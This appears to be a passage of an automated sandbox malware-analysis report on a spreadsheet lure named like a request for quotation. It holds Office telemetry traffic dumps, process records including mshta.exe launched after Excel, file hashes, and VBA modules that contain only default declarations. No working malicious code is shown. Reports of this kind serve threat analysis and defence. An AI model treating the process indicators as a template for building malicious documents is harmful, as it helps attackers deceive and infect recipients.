                            2025-03-24 08:33:32 UTC16384INData Raw: 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 30 31 31 37 76 30 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 31 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 38 79 6c 6c 66 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 56 20 56 3d 22 43 6c 69 63 6b 22 20 54 3d 22 57 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43
                            Data Ascii: S T="1" /> </T></R><$!#>100117v0+<?xml version="1.0" encoding="utf-8"?><R Id="100117" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="8yllf" /> </S> <C T="W" I="0" O="false"> <V V="Click" T="W" /> </C> <C
                            2025-03-24 08:33:32 UTC16384INData Raw: 20 20 20 3c 2f 41 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 37 38 31 76 31 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 37 38 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 67 6f 34 74 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 68 6c 76 79 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43
                            Data Ascii: </A> </C> <T> <S T="2" /> <S T="3" /> </T></R><$!#>10781v1+<?xml version="1.0" encoding="utf-8"?><R Id="10781" V="1" DC="SM" T="Subrule" xmlns=""> <S> <UTS T="1" Id="bgo4t" /> <UTS T="2" Id="bhlvy" /> </S> <C
                            2025-03-24 08:33:32 UTC16384INData Raw: 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 30 30 30 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 45 22 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: "AND"> <L> <O T="GT"> <L> <S T="1" F="0" /> </L> <R> <V V="1000" T="U32" /> </R> </O> </L> <R> <O T="LE">
                            2025-03-24 08:33:32 UTC16384INData Raw: 54 3d 22 55 33 32 22 20 49 3d 22 32 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 56 69 64 65 6f 43 61 6c 6c 56 69 64 65 6f 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 36 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 33 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 53 61 53 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 34 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 4f 76 65 72 66 6c 6f 77 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20
                            Data Ascii: T="U32" I="22" O="false" N="FlyoutVideoCallVideo"> <C> <S T="26" /> </C> </C> <C T="U32" I="23" O="false" N="FlyoutSaS"> <C> <S T="27" /> </C> </C> <C T="U32" I="24" O="false" N="FlyoutOverflow"> <C>
                            2025-03-24 08:33:32 UTC16384INData Raw: 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 39 30 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 4e 44 42 2e 55 6e 6b 6e 6f 77 6e 2e 43 6f 72 72 75 70 74 69 6f 6e 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 53 3d 22 31 30 30 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 45 74 77 20 54 3d 22 31 22 20 45 3d 22 33 39 35 22 20 47 3d 22 7b 32 61 64 66 38 65 32
                            Data Ascii: 1.0" encoding="utf-8"?><R Id="10907" V="0" DC="SM" EN="Office.Outlook.Desktop.NDB.Unknown.Corruption" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="100" DCa="PSU" xmlns=""> <S> <Etw T="1" E="395" G="{2adf8e2
                            2025-03-24 08:33:32 UTC16384INData Raw: 3d 22 32 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 33 22 20 49 64 3d 22 62 70 66 79 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 34 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 50 68 6f 74 6f 53 69 7a 65 49 6e 42 79 74 65 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 55 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20
                            Data Ascii: ="2" E="TelemetryShutdown" /> <UTS T="3" Id="bpfy1" /> <F T="4"> <O T="GT"> <L> <S T="3" F="PhotoSizeInBytes" /> </L> <R> <V V="0" T="U64" /> </R> </O> </F> </S>
                            2025-03-24 08:33:32 UTC16384INData Raw: 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 65 76 65 6e 74 49 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 33 35 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 74 63 69 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <L> <S T="4" F="eventId" /> </L> <R> <V V="135" T="I32" /> </R> </O> </F> <F T="7"> <O T="EQ"> <L> <S T="5" F="tcid" /> </L> <R>
                            2025-03-24 08:33:32 UTC16384INData Raw: 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 31 30 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 46 69 6c 65 50 72 6f 74 65 63 74 69 6f 6e 53 74 61 74 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 35 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 4f 66 54 68 72 6f 77 6e 45 78 63 65 70
                            Data Ascii: </F> <F T="10"> <O T="EQ"> <L> <S T="3" F="FileProtectionState" /> </L> <R> <V V="5" T="U32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="CountOfThrownExcep
                            2025-03-24 08:33:32 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 72 65 73 75 6c 74 73 5f 49 73 4e 75 6c 6c 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c
                            Data Ascii: <S T="5" F="results_IsNull" /> </L> <R> <V V="false" T="B" /> </R> </O> </L> <R> <O T="EQ"> <L


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.94970213.107.246.404431896C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            TimestampBytes transferredDirectionData
                            2025-03-24 08:33:37 UTC214OUTGET /rules/rule120607v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                            Host: otelrules.svc.static.microsoft
                            2025-03-24 08:33:38 UTC491INHTTP/1.1 200 OK
                            Date: Mon, 24 Mar 2025 08:33:37 GMT
                            Content-Type: text/xml
                            Content-Length: 204
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                            ETag: "0x8DC582BB6C8527A"
                            x-ms-request-id: cb52e497-801e-0035-58da-9b752a000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20250324T083337Z-17cccd5449bg7c4bhC1EWR84740000000a8g000000000x22
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2025-03-24 08:33:38 UTC204INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 37 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 45 52 3d 22 31 32 30 36 30 33 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 62 70 7a 73 22 20 41 3d 22 39 34 30 74 63 20 39 78 35 6a 73 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120607" V="1" DC="SM" T="Subrule" ER="120603" xmlns=""> <S> <UTS T="1" Id="bbpzs" A="940tc 9x5js" /> </S> <T> <S T="1" /> </T></R>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.94970313.107.246.404431896C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            TimestampBytes transferredDirectionData
                            2025-03-24 08:33:37 UTC214OUTGET /rules/rule120603v8s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                            Host: otelrules.svc.static.microsoft
                            2025-03-24 08:33:38 UTC494INHTTP/1.1 200 OK
                            Date: Mon, 24 Mar 2025 08:33:38 GMT
                            Content-Type: text/xml
                            Content-Length: 2128
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                            ETag: "0x8DC582BA41F3C62"
                            x-ms-request-id: 0fe88ecf-101e-007a-32da-9b047e000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20250324T083338Z-17cccd5449bzw64jhC1EWRz2340000000a2g000000006vaz
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2025-03-24 08:33:38 UTC2128INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 33 22 20 56 3d 22 38 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 64 64 69 74 69 6f 6e 61 6c 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 45 3d 22 66 61 6c 73 65 22 20 44 4c 3d
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120603" V="8" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAdditional" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" E="false" DL=


                            Statistics

                            CPU Usage

                            050100s020406080100

                            Click to jump to process

                            Memory Usage

                            050100s0.00100200MB

                            Click to jump to process

                            High Level Behavior Distribution

                            • File
                            • Registry

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:04:32:21
                            Start date:24/03/2025
                            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                            Imagebase:0xb60000
                            File size:53'161'064 bytes
                            MD5 hash:4A871771235598812032C822E6F68F19
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false
                            Show Windows behavior

                            File Activities

                            Show Windows behavior

                            Section Activities

                            Show Windows behavior

                            Registry Activities

                            Show Windows behavior

                            COM Activities

                            Show Windows behavior

                            Mutex Activities

                            Show Windows behavior

                            Process Activities

                            Show Windows behavior

                            Thread Activities

                            Show Windows behavior

                            Memory Activities

                            Show Windows behavior

                            System Activities

                            Show Windows behavior

                            Timing Activities

                            Show Windows behavior

                            Windows UI Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                            General

                            Target ID:11
                            Start time:04:33:17
                            Start date:24/03/2025
                            Path:C:\Windows\SysWOW64\mshta.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\SysWOW64\mshta.exe -Embedding
                            Imagebase:0xab0000
                            File size:13'312 bytes
                            MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Section Activities

                            Show Windows behavior

                            Registry Activities

                            Show Windows behavior

                            COM Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Thread Activities

                            Show Windows behavior

                            Memory Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Windows UI Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                            General

                            Target ID:13
                            Start time:04:33:25
                            Start date:24/03/2025
                            Path:C:\Windows\splwow64.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\splwow64.exe 12288
                            Imagebase:0x7ff76e080000
                            File size:163'840 bytes
                            MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Section Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Process Activities

                            Show Windows behavior

                            Thread Activities

                            Show Windows behavior

                            Memory Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                            General

                            Target ID:16
                            Start time:04:33:43
                            Start date:24/03/2025
                            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\ENQUIRY - RFQ 674441-76450.xla.xlsx"
                            Imagebase:0xb60000
                            File size:53'161'064 bytes
                            MD5 hash:4A871771235598812032C822E6F68F19
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true
                            Show Windows behavior

                            File Activities

                            Show Windows behavior

                            Section Activities

                            Show Windows behavior

                            Registry Activities

                            Show Windows behavior

                            COM Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Process Activities

                            Show Windows behavior

                            Thread Activities

                            Show Windows behavior

                            Memory Activities

                            Show Windows behavior

                            System Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Windows UI Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                            Disassembly

                            Code Analysis

                            Call Graph

                            Hide Legend
                            • Entrypoint
                            • Decryption Function
                            • Executed
                            • Not Executed
                            • Show Help
                            callgraph 1 Error: Graph is empty

                            Module: Sheet1

                            Declaration
                            LineContent
                            1

                            Attribute VB_Name = "Sheet1"

                            2

                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                            3

                            Attribute VB_GlobalNameSpace = False

                            4

                            Attribute VB_Creatable = False

                            5

                            Attribute VB_PredeclaredId = True

                            6

                            Attribute VB_Exposed = True

                            7

                            Attribute VB_TemplateDerived = False

                            8

                            Attribute VB_Customizable = True

                            Module: Sheet2

                            Declaration
                            LineContent
                            1

                            Attribute VB_Name = "Sheet2"

                            2

                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                            3

                            Attribute VB_GlobalNameSpace = False

                            4

                            Attribute VB_Creatable = False

                            5

                            Attribute VB_PredeclaredId = True

                            6

                            Attribute VB_Exposed = True

                            7

                            Attribute VB_TemplateDerived = False

                            8

                            Attribute VB_Customizable = True

                            Module: Sheet3

                            Declaration
                            LineContent
                            1

                            Attribute VB_Name = "Sheet3"

                            2

                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                            3

                            Attribute VB_GlobalNameSpace = False

                            4

                            Attribute VB_Creatable = False

                            5

                            Attribute VB_PredeclaredId = True

                            6

                            Attribute VB_Exposed = True

                            7

                            Attribute VB_TemplateDerived = False

                            8

                            Attribute VB_Customizable = True

                            Module: ThisWorkbook

                            Declaration
                            LineContent
                            1

                            Attribute VB_Name = "ThisWorkbook"

                            2

                            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                            3

                            Attribute VB_GlobalNameSpace = False

                            4

                            Attribute VB_Creatable = False

                            5

                            Attribute VB_PredeclaredId = True

                            6

                            Attribute VB_Exposed = True

                            7

                            Attribute VB_TemplateDerived = False

                            8

                            Attribute VB_Customizable = True